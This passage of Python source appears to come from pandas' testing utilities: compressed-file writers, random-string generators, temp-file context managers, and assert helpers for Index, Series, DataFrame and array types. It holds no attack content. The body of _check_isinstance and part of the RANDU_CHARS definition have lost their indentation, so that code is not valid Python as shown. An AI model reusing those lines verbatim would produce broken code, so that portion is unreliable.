    finally:
        f.close()
        # The enclosing archive handle needs closing separately.
        if zip_file is not None:
            zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
    """
    Write data to a compressed file.

    Parameters
    ----------
    compression : {'gzip', 'bz2', 'zip', 'xz'}
        The compression type to use.
    path : str
        The file path to write the data.
    data : str
        The data to write.
    dest : str, default "test"
        The destination file (for ZIP only)

    Raises
    ------
    ValueError : An invalid compression value was passed in.
    """
    if compression == "zip":
        import zipfile

        # ZIP archives need a member name, so they take a different API.
        with zipfile.ZipFile(path, mode="w") as f:
            f.writestr(dest, data)
        return

    if compression == "gzip":
        import gzip

        opener = gzip.GzipFile
    elif compression == "bz2":
        import bz2

        opener = bz2.BZ2File
    elif compression == "xz":
        opener = _get_lzma_file(lzma)
    else:
        raise ValueError("Unrecognized compression type: {}".format(compression))

    with opener(path, mode="wb") as f:
        f.write(data)
def assert_almost_equal(
    left, right, check_dtype="equiv", check_less_precise=False, **kwargs
):
    """
    Check that the left and right objects are approximately equal.

    By approximately equal, we refer to objects that are numbers or that
    contain numbers which may be equivalent to specific levels of precision.

    Parameters
    ----------
    left : object
    right : object
    check_dtype : bool or {'equiv'}, default 'equiv'
        Check dtype if both a and b are the same type. If 'equiv' is passed in,
        then `RangeIndex` and `Int64Index` are also considered equivalent
        when doing type checking.
    check_less_precise : bool or int, default False
        Specify comparison precision. 5 digits (False) or 3 digits (True)
        after decimal points are compared. If int, then specify the number
        of digits to compare.

        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    """
    # Dispatch to the pandas-container-specific asserters with exact
    # checking disabled so comparisons stay approximate.
    if isinstance(left, pd.Index):
        assert_index_equal(
            left,
            right,
            check_exact=False,
            exact=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )

    elif isinstance(left, pd.Series):
        assert_series_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )

    elif isinstance(left, pd.DataFrame):
        assert_frame_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )

    else:
        # Other sequences.
        if check_dtype:
            if is_number(left) and is_number(right):
                # Do not compare numeric classes, like np.float64 and float.
                pass
            elif is_bool(left) and is_bool(right):
                # Do not compare bool classes, like np.bool_ and bool.
                pass
            else:
                if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
                    obj = "numpy array"
                else:
                    obj = "Input"
                assert_class_equal(left, right, obj=obj)
        # The C-implemented comparison does the actual approximate check.
        _testing.assert_almost_equal(
            left,
            right,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
err_msg = "{name} Expected type {exp_type}, found {act_type} instead"
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(left))
)
if not isinstance(right, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(right))
)
def assert_dict_equal(left, right, compare_keys=True):
    """Assert two dicts are equal; raises if either argument is not a dict."""
    _check_isinstance(left, right, dict)
    _testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p=0.5):
    """Return random boolean(s) of the given shape, True with probability p."""
    draws = rand(*size)
    return draws <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
    """Generate an array of byte strings.

    Draws ``nchars * prod(size)`` single characters from RANDS_CHARS, then
    reinterprets them as length-``nchars`` strings reshaped to ``size``.
    """
    flat = np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
    strings = flat.view((np.str_, nchars)).reshape(size)
    # dtype=None keeps the fixed-width string dtype; otherwise cast (default object).
    return strings if dtype is None else strings.astype(dtype)
def randu_array(nchars, size, dtype="O"):
    """Generate an array of unicode strings.

    Same scheme as rands_array but sampling from the non-ASCII RANDU_CHARS
    pool.
    """
    flat = np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
    strings = flat.view((np.unicode_, nchars)).reshape(size)
    # dtype=None keeps the fixed-width string dtype; otherwise cast (default object).
    return strings if dtype is None else strings.astype(dtype)
def rands(nchars):
    """
    Generate one random byte string.

    See `rands_array` if you want to create an array of random strings.
    """
    chosen = np.random.choice(RANDS_CHARS, nchars)
    return "".join(chosen)
def randu(nchars):
    """
    Generate one random unicode string.

    See `randu_array` if you want to create an array of random unicode strings.
    """
    chosen = np.random.choice(RANDU_CHARS, nchars)
    return "".join(chosen)
def close(fignum=None):
    """Close the matplotlib figure ``fignum``, or every open figure when None."""
    from matplotlib.pyplot import get_fignums, close as _close
    if fignum is not None:
        _close(fignum)
        return
    for num in get_fignums():
        _close(num)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
    """Yield a temporary path (or file object) that is cleaned up on exit.

    Parameters
    ----------
    filename : str (optional)
        if None, creates a temporary file which is then removed when out of
        scope. if passed, creates temporary file with filename as ending.
    return_filelike : bool (default False)
        if True, returns a file-like which is *always* cleaned. Necessary for
        savefig and other functions which want to append extensions.
    """
    filename = filename or ""
    fd = None
    if return_filelike:
        handle = tempfile.TemporaryFile(suffix=filename)
        try:
            yield handle
        finally:
            handle.close()
        return
    # don't generate tempfile if using a path with directory specified
    if len(os.path.dirname(filename)):
        raise ValueError("Can't pass a qualified name to ensure_clean()")
    try:
        fd, filename = tempfile.mkstemp(suffix=filename)
    except UnicodeEncodeError:
        import pytest
        pytest.skip("no unicode file names on this system")
    try:
        yield filename
    finally:
        # Best-effort cleanup: report (but do not raise) on close/remove errors.
        try:
            os.close(fd)
        except OSError:
            print(
                "Couldn't close file descriptor: {fdesc} (file: {fname})".format(
                    fdesc=fd, fname=filename
                )
            )
        try:
            if os.path.exists(filename):
                os.remove(filename)
        except OSError as e:
            print("Exception on removing file: {error}".format(error=e))
@contextmanager
def ensure_clean_dir():
    """
    Yield a freshly created temporary directory path; the directory is
    removed (best effort, errors swallowed) when the context exits.
    """
    path = tempfile.mkdtemp(suffix="")
    try:
        yield path
    finally:
        try:
            rmtree(path)
        except OSError:
            # removal is best-effort only
            pass
@contextmanager
def ensure_safe_environment_variables():
    """
    Context manager that snapshots os.environ on entry and restores it on
    exit, so environment changes inside the block never leak out.
    """
    snapshot = dict(os.environ)
    try:
        yield
    finally:
        os.environ.clear()
        os.environ.update(snapshot)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
    """Checks if the set of unique elements of arr1 and arr2 are equivalent.
    """
    return frozenset(arr2) == frozenset(arr1)
def assert_index_equal(
    left: Index,
    right: Index,
    exact: Union[bool, str] = "equiv",
    check_names: bool = True,
    check_less_precise: Union[bool, int] = False,
    check_exact: bool = True,
    check_categorical: bool = True,
    obj: str = "Index",
) -> None:
    """
    Check that left and right Index are equal.
    Parameters
    ----------
    left : Index
    right : Index
    exact : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    check_names : bool, default True
        Whether to check the names attribute.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
    check_exact : bool, default True
        Whether to compare number exactly.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    obj : str, default 'Index'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    __tracebackhide__ = True
    def _check_types(l, r, obj="Index"):
        # Compare class/dtype/inferred_type of two indexes according to `exact`;
        # a falsy `exact` disables all type checking.
        if exact:
            assert_class_equal(l, r, exact=exact, obj=obj)
            # Skip exact dtype checking when `check_categorical` is False
            if check_categorical:
                assert_attr_equal("dtype", l, r, obj=obj)
            # allow string-like to have different inferred_types
            if l.inferred_type in ("string", "unicode"):
                assert r.inferred_type in ("string", "unicode")
            else:
                assert_attr_equal("inferred_type", l, r, obj=obj)
    def _get_ilevel_values(index, level):
        # accept level number only
        # Materialize one MultiIndex level positionally (codes -> values),
        # preserving the level name, without using get_level_values (which
        # can change the dtype).
        unique = index.levels[level]
        labels = index.codes[level]
        filled = take_1d(unique.values, labels, fill_value=unique._na_value)
        values = unique._shallow_copy(filled, name=index.names[level])
        return values
    # instance validation
    _check_isinstance(left, right, Index)
    # class / dtype comparison
    _check_types(left, right, obj=obj)
    # level comparison
    if left.nlevels != right.nlevels:
        msg1 = "{obj} levels are different".format(obj=obj)
        msg2 = "{nlevels}, {left}".format(nlevels=left.nlevels, left=left)
        msg3 = "{nlevels}, {right}".format(nlevels=right.nlevels, right=right)
        raise_assert_detail(obj, msg1, msg2, msg3)
    # length comparison
    if len(left) != len(right):
        msg1 = "{obj} length are different".format(obj=obj)
        msg2 = "{length}, {left}".format(length=len(left), left=left)
        msg3 = "{length}, {right}".format(length=len(right), right=right)
        raise_assert_detail(obj, msg1, msg2, msg3)
    # MultiIndex special comparison for little-friendly error messages
    if left.nlevels > 1:
        left = cast(MultiIndex, left)
        right = cast(MultiIndex, right)
        # Recurse level by level so failures report which level differs.
        for level in range(left.nlevels):
            # cannot use get_level_values here because it can change dtype
            llevel = _get_ilevel_values(left, level)
            rlevel = _get_ilevel_values(right, level)
            lobj = "MultiIndex level [{level}]".format(level=level)
            assert_index_equal(
                llevel,
                rlevel,
                exact=exact,
                check_names=check_names,
                check_less_precise=check_less_precise,
                check_exact=check_exact,
                obj=lobj,
            )
            # get_level_values may change dtype
            _check_types(left.levels[level], right.levels[level], obj=obj)
    # skip exact index checking when `check_categorical` is False
    if check_exact and check_categorical:
        if not left.equals(right):
            # Report the percentage of differing positions in the message.
            diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
            msg = "{obj} values are different ({pct} %)".format(
                obj=obj, pct=np.round(diff, 5)
            )
            raise_assert_detail(obj, msg, left, right)
    else:
        # Approximate comparison; `exact` doubles as the dtype-check flag here.
        _testing.assert_almost_equal(
            left.values,
            right.values,
            check_less_precise=check_less_precise,
            check_dtype=exact,
            obj=obj,
            lobj=left,
            robj=right,
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("names", left, right, obj=obj)
    if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
        assert_attr_equal("freq", left, right, obj=obj)
    if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
        assert_interval_array_equal(left.values, right.values)
    if check_categorical:
        if is_categorical_dtype(left) or is_categorical_dtype(right):
            assert_categorical_equal(
                left.values, right.values, obj="{obj} category".format(obj=obj)
            )
def assert_class_equal(left, right, exact=True, obj="Input"):
    """checks classes are equal."""
    __tracebackhide__ = True
    def repr_class(x):
        if isinstance(x, Index):
            # return Index as it is to include values in the error message
            return x
        try:
            return x.__class__.__name__
        except AttributeError:
            return repr(type(x))
    same_type = type(left) == type(right)
    if exact == "equiv":
        if not same_type:
            # allow equivalence of Int64Index/RangeIndex
            names = {type(left).__name__, type(right).__name__}
            if names - {"Int64Index", "RangeIndex"}:
                msg = "{obj} classes are not equivalent".format(obj=obj)
                raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
    elif exact and not same_type:
        msg = "{obj} classes are different".format(obj=obj)
        raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
    """checks attributes are equal. Both objects must have attribute.

    Parameters
    ----------
    attr : str
        Attribute name being compared.
    left : object
    right : object
    obj : str, default 'Attributes'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    left_attr = getattr(left, attr)
    right_attr = getattr(right, attr)
    # Identical objects are trivially equal (also handles shared sentinels).
    if left_attr is right_attr:
        return True
    # Two NaNs compare unequal with ==, but count as matching attributes here.
    if (
        is_number(left_attr)
        and np.isnan(left_attr)
        and is_number(right_attr)
        and np.isnan(right_attr)
    ):
        # np.nan
        return True
    try:
        result = left_attr == right_attr
    except TypeError:
        # datetimetz on rhs may raise TypeError
        result = False
    if not isinstance(result, bool):
        # array-like comparison result: require every element to match
        result = result.all()
    if result:
        return True
    msg = 'Attribute "{attr}" are different'.format(attr=attr)
    raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
    """Assert that ``objs`` looks like a plotting return value: either an
    array/Series of Axes (or dicts), or a single Artist / tuple / dict."""
    import matplotlib.pyplot as plt
    if isinstance(objs, (pd.Series, np.ndarray)):
        # Every flattened element must be an Axes (or a dict of artists).
        for el in objs.ravel():
            msg = (
                "one of 'objs' is not a matplotlib Axes instance, type "
                "encountered {name!r}"
            ).format(name=el.__class__.__name__)
            assert isinstance(el, (plt.Axes, dict)), msg
    else:
        msg = (
            "objs is neither an ndarray of Artist instances nor a "
            'single Artist instance, tuple, or dict, "objs" is a {name!r}'.format(
                name=objs.__class__.__name__
            )
        )
        assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
    """Return True if *obj* exposes an ``__iter__`` attribute."""
    return getattr(obj, "__iter__", None) is not None
def assert_is_sorted(seq):
    """Assert that the sequence is sorted (compares against its sorted copy)."""
    values = seq.values if isinstance(seq, (Index, Series)) else seq
    # sorting does not change precisions
    assert_numpy_array_equal(values, np.sort(np.array(values)))
def assert_categorical_equal(
    left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
    """Test that Categoricals are equivalent.
    Parameters
    ----------
    left : Categorical
    right : Categorical
    check_dtype : bool, default True
        Check that integer dtype of the codes are the same
    check_category_order : bool, default True
        Whether the order of the categories should be compared, which
        implies identical integer codes.  If False, only the resulting
        values are compared.  The ordered attribute is
        checked regardless.
    obj : str, default 'Categorical'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, Categorical)
    if check_category_order:
        # Order-sensitive: category arrays must match positionally and the
        # raw integer codes must be identical.
        assert_index_equal(
            left.categories, right.categories, obj="{obj}.categories".format(obj=obj)
        )
        assert_numpy_array_equal(
            left.codes,
            right.codes,
            check_dtype=check_dtype,
            obj="{obj}.codes".format(obj=obj),
        )
    else:
        # Order-insensitive: compare sorted category sets, then the
        # materialized values (categories taken at each code position).
        assert_index_equal(
            left.categories.sort_values(),
            right.categories.sort_values(),
            obj="{obj}.categories".format(obj=obj),
        )
        assert_index_equal(
            left.categories.take(left.codes),
            right.categories.take(right.codes),
            obj="{obj}.values".format(obj=obj),
        )
    # `ordered` must match in both modes.
    assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
    """Test that two IntervalArrays are equivalent.
    Parameters
    ----------
    left, right : IntervalArray
        The IntervalArrays to compare.
    exact : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    obj : str, default 'IntervalArray'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, IntervalArray)
    # Compare the two endpoint indexes separately so a failure pinpoints
    # which side differs.
    assert_index_equal(
        left.left, right.left, exact=exact, obj="{obj}.left".format(obj=obj)
    )
    # Bug fix: this comparison previously labeled failures "{obj}.left",
    # so a mismatch in the right endpoints was misreported.
    assert_index_equal(
        left.right, right.right, exact=exact, obj="{obj}.right".format(obj=obj)
    )
    assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
    """Assert two PeriodArrays have identical ordinal data and matching freq."""
    _check_isinstance(left, right, PeriodArray)
    values_label = "{obj}.values".format(obj=obj)
    assert_numpy_array_equal(left._data, right._data, obj=values_label)
    assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
    """Assert two DatetimeArrays have identical underlying data, freq and tz."""
    __tracebackhide__ = True
    _check_isinstance(left, right, DatetimeArray)
    data_label = "{obj}._data".format(obj=obj)
    assert_numpy_array_equal(left._data, right._data, obj=data_label)
    for name in ("freq", "tz"):
        assert_attr_equal(name, left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
    """Assert two TimedeltaArrays have identical underlying data and freq."""
    __tracebackhide__ = True
    _check_isinstance(left, right, TimedeltaArray)
    data_label = "{obj}._data".format(obj=obj)
    assert_numpy_array_equal(left._data, right._data, obj=data_label)
    assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
    """Raise an AssertionError with the standard obj/message/left/right layout
    used by all assert_* helpers; ``diff`` appends an optional extra line."""
    __tracebackhide__ = True
    def _display(value):
        # ndarrays are pretty-printed; categoricals are shown via repr;
        # everything else is formatted as-is.
        if isinstance(value, np.ndarray):
            return pprint_thing(value)
        if is_categorical_dtype(value):
            return repr(value)
        return value
    left = _display(left)
    right = _display(right)
    msg = """{obj} are different
{message}
[left]: {left}
[right]: {right}""".format(
        obj=obj, message=message, left=left, right=right
    )
    if diff is not None:
        msg += "\n[diff]: {diff}".format(diff=diff)
    raise AssertionError(msg)
def assert_numpy_array_equal(
    left,
    right,
    strict_nan=False,
    check_dtype=True,
    err_msg=None,
    check_same=None,
    obj="numpy array",
):
    """ Checks that 'np.ndarray' is equivalent
    Parameters
    ----------
    left : np.ndarray or iterable
    right : np.ndarray or iterable
    strict_nan : bool, default False
        If True, consider NaN and None to be different.
    check_dtype: bool, default True
        check dtype if both a and b are np.ndarray
    err_msg : str, default None
        If provided, used as assertion message
    check_same : None|'copy'|'same', default None
        Ensure left and right refer/do not refer to the same memory area
    obj : str, default 'numpy array'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    # instance validation
    # Show a detailed error message when classes are different
    assert_class_equal(left, right, obj=obj)
    # both classes must be an np.ndarray
    _check_isinstance(left, right, np.ndarray)
    def _get_base(obj):
        # Follow `.base` to the buffer owner so `check_same` compares the
        # actual memory area rather than a view wrapper.
        return obj.base if getattr(obj, "base", None) is not None else obj
    left_base = _get_base(left)
    right_base = _get_base(right)
    if check_same == "same":
        if left_base is not right_base:
            msg = "{left!r} is not {right!r}".format(left=left_base, right=right_base)
            raise AssertionError(msg)
    elif check_same == "copy":
        if left_base is right_base:
            msg = "{left!r} is {right!r}".format(left=left_base, right=right_base)
            raise AssertionError(msg)
    def _raise(left, right, err_msg):
        # Raise with either the caller-supplied message or a generated one
        # (shape mismatch, or percentage of differing positions).
        if err_msg is None:
            if left.shape != right.shape:
                raise_assert_detail(
                    obj,
                    "{obj} shapes are different".format(obj=obj),
                    left.shape,
                    right.shape,
                )
            diff = 0
            for l, r in zip(left, right):
                # count up differences
                if not array_equivalent(l, r, strict_nan=strict_nan):
                    diff += 1
            diff = diff * 100.0 / left.size
            msg = "{obj} values are different ({pct} %)".format(
                obj=obj, pct=np.round(diff, 5)
            )
            raise_assert_detail(obj, msg, left, right)
        raise AssertionError(err_msg)
    # compare shape and values
    if not array_equivalent(left, right, strict_nan=strict_nan):
        _raise(left, right, err_msg)
    if check_dtype:
        if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
            assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
    left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
    """Check that left and right ExtensionArrays are equal.
    Parameters
    ----------
    left, right : ExtensionArray
        The two arrays to compare
    check_dtype : bool, default True
        Whether to check if the ExtensionArray dtypes are identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
    check_exact : bool, default False
        Whether to compare number exactly.
    Notes
    -----
    Missing values are checked separately from valid values.
    A mask of missing values is computed for each and checked to match.
    The remaining all-valid values are cast to object dtype and checked.
    """
    assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
    assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
    if check_dtype:
        assert_attr_equal("dtype", left, right, obj="ExtensionArray")
    if hasattr(left, "asi8") and type(right) == type(left):
        # Avoid slow object-dtype comparisons
        assert_numpy_array_equal(left.asi8, right.asi8)
        return
    # NA positions must agree before the valid values are compared.
    left_na = np.asarray(left.isna())
    right_na = np.asarray(right.isna())
    assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
    # Compare only the non-missing entries, as plain object ndarrays.
    left_valid = np.asarray(left[~left_na].astype(object))
    right_valid = np.asarray(right[~right_na].astype(object))
    if check_exact:
        assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
    else:
        _testing.assert_almost_equal(
            left_valid,
            right_valid,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            obj="ExtensionArray",
        )
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_series_type=True,
    check_less_precise=False,
    check_names=True,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    obj="Series",
):
    """
    Check that left and right Series are equal.
    Parameters
    ----------
    left : Series
    right : Series
    check_dtype : bool, default True
        Whether to check the Series dtype is identical.
    check_index_type : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_series_type : bool, default True
        Whether to check the Series class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    check_names : bool, default True
        Whether to check the Series and Index names attribute.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    obj : str, default 'Series'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    __tracebackhide__ = True
    # instance validation
    _check_isinstance(left, right, Series)
    if check_series_type:
        # ToDo: There are some tests using rhs is sparse
        # lhs is dense. Should use assert_class_equal in future
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # length comparison
    if len(left) != len(right):
        msg1 = "{len}, {left}".format(len=len(left), left=left.index)
        msg2 = "{len}, {right}".format(len=len(right), right=right.index)
        raise_assert_detail(obj, "Series length are different", msg1, msg2)
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj="{obj}.index".format(obj=obj),
    )
    if check_dtype:
        # We want to skip exact dtype checking when `check_categorical`
        # is False. We'll still raise if only one is a `Categorical`,
        # regardless of `check_categorical`
        if (
            is_categorical_dtype(left)
            and is_categorical_dtype(right)
            and not check_categorical
        ):
            pass
        else:
            assert_attr_equal(
                "dtype", left, right, obj="Attributes of {obj}".format(obj=obj)
            )
    # Value comparison: the branch chosen depends on the flags and dtypes;
    # the order of these checks matters (exact > datetimelike-compat >
    # interval > tz-aware extension > other extension > approximate).
    if check_exact:
        assert_numpy_array_equal(
            left._internal_get_values(),
            right._internal_get_values(),
            check_dtype=check_dtype,
            obj="{obj}".format(obj=obj),
        )
    elif check_datetimelike_compat:
        # we want to check only if we have compat dtypes
        # e.g. integer and M|m are NOT compat, but we can simply check
        # the values in that case
        if needs_i8_conversion(left) or needs_i8_conversion(right):
            # datetimelike may have different objects (e.g. datetime.datetime
            # vs Timestamp) but will compare equal
            if not Index(left.values).equals(Index(right.values)):
                msg = (
                    "[datetimelike_compat=True] {left} is not equal to {right}."
                ).format(left=left.values, right=right.values)
                raise AssertionError(msg)
        else:
            assert_numpy_array_equal(
                left._internal_get_values(),
                right._internal_get_values(),
                check_dtype=check_dtype,
            )
    elif is_interval_dtype(left) or is_interval_dtype(right):
        assert_interval_array_equal(left.array, right.array)
    elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
        # .values is an ndarray, but ._values is the ExtensionArray.
        # TODO: Use .array
        assert is_extension_array_dtype(right.dtype)
        assert_extension_array_equal(left._values, right._values)
    elif (
        is_extension_array_dtype(left)
        and not is_categorical_dtype(left)
        and is_extension_array_dtype(right)
        and not is_categorical_dtype(right)
    ):
        assert_extension_array_equal(left.array, right.array)
    else:
        _testing.assert_almost_equal(
            left._internal_get_values(),
            right._internal_get_values(),
            check_less_precise=check_less_precise,
            check_dtype=check_dtype,
            obj="{obj}".format(obj=obj),
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("name", left, right, obj=obj)
    if check_categorical:
        if is_categorical_dtype(left) or is_categorical_dtype(right):
            assert_categorical_equal(
                left.values, right.values, obj="{obj} category".format(obj=obj)
            )
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_column_type="equiv",
    check_frame_type=True,
    check_less_precise=False,
    check_names=True,
    by_blocks=False,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    check_like=False,
    obj="DataFrame",
):
    """
    Check that left and right DataFrame are equal.
    This function is intended to compare two DataFrames and output any
    differences. Is is mostly intended for use in unit tests.
    Additional parameters allow varying the strictness of the
    equality checks performed.
    Parameters
    ----------
    left : DataFrame
        First DataFrame to compare.
    right : DataFrame
        Second DataFrame to compare.
    check_dtype : bool, default True
        Whether to check the DataFrame dtype is identical.
    check_index_type : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_column_type : bool or {'equiv'}, default 'equiv'
        Whether to check the columns class, dtype and inferred_type
        are identical. Is passed as the ``exact`` argument of
        :func:`assert_index_equal`.
    check_frame_type : bool, default True
        Whether to check the DataFrame class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    check_names : bool, default True
        Whether to check that the `names` attribute for both the `index`
        and `column` attributes of the DataFrame is identical.
    by_blocks : bool, default False
        Specify how to compare internal data. If False, compare by columns.
        If True, compare by blocks.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    check_like : bool, default False
        If True, ignore the order of index & columns.
        Note: index labels must match their respective rows
        (same as in columns) - same labels must be with the same data.
    obj : str, default 'DataFrame'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    See Also
    --------
    assert_series_equal : Equivalent method for asserting Series equality.
    DataFrame.equals : Check DataFrame equality.
    Examples
    --------
    This example shows comparing two DataFrames that are equal
    but with columns of differing dtypes.
    >>> from pandas.util.testing import assert_frame_equal
    >>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    >>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
    df1 equals itself.
    >>> assert_frame_equal(df1, df1)
    df1 differs from df2 as column 'b' is of a different type.
    >>> assert_frame_equal(df1, df2)
    Traceback (most recent call last):
    ...
    AssertionError: Attributes of DataFrame.iloc[:, 1] are different
    Attribute "dtype" are different
    [left]:  int64
    [right]: float64
    Ignore differing dtypes in columns with check_dtype.
    >>> assert_frame_equal(df1, df2, check_dtype=False)
    """
    __tracebackhide__ = True
    # instance validation
    _check_isinstance(left, right, DataFrame)
    if check_frame_type:
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # shape comparison
    if left.shape != right.shape:
        raise_assert_detail(
            obj,
            "{obj} shape mismatch".format(obj=obj),
            "{shape!r}".format(shape=left.shape),
            "{shape!r}".format(shape=right.shape),
        )
    if check_like:
        # Align left to right's labels so subsequent comparisons are
        # order-insensitive.
        left, right = left.reindex_like(right), right
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj="{obj}.index".format(obj=obj),
    )
    # column comparison
    assert_index_equal(
        left.columns,
        right.columns,
        exact=check_column_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj="{obj}.columns".format(obj=obj),
    )
    # compare by blocks
    if by_blocks:
        # Group both frames by internal block dtype and compare each
        # dtype's sub-frame recursively.
        rblocks = right._to_dict_of_blocks()
        lblocks = left._to_dict_of_blocks()
        for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
            assert dtype in lblocks
            assert dtype in rblocks
            assert_frame_equal(
                lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
            )
    # compare by columns
    else:
        for i, col in enumerate(left.columns):
            assert col in right
            lcol = left.iloc[:, i]
            rcol = right.iloc[:, i]
            assert_series_equal(
                lcol,
                rcol,
                check_dtype=check_dtype,
                check_index_type=check_index_type,
                check_less_precise=check_less_precise,
                check_exact=check_exact,
                check_names=check_names,
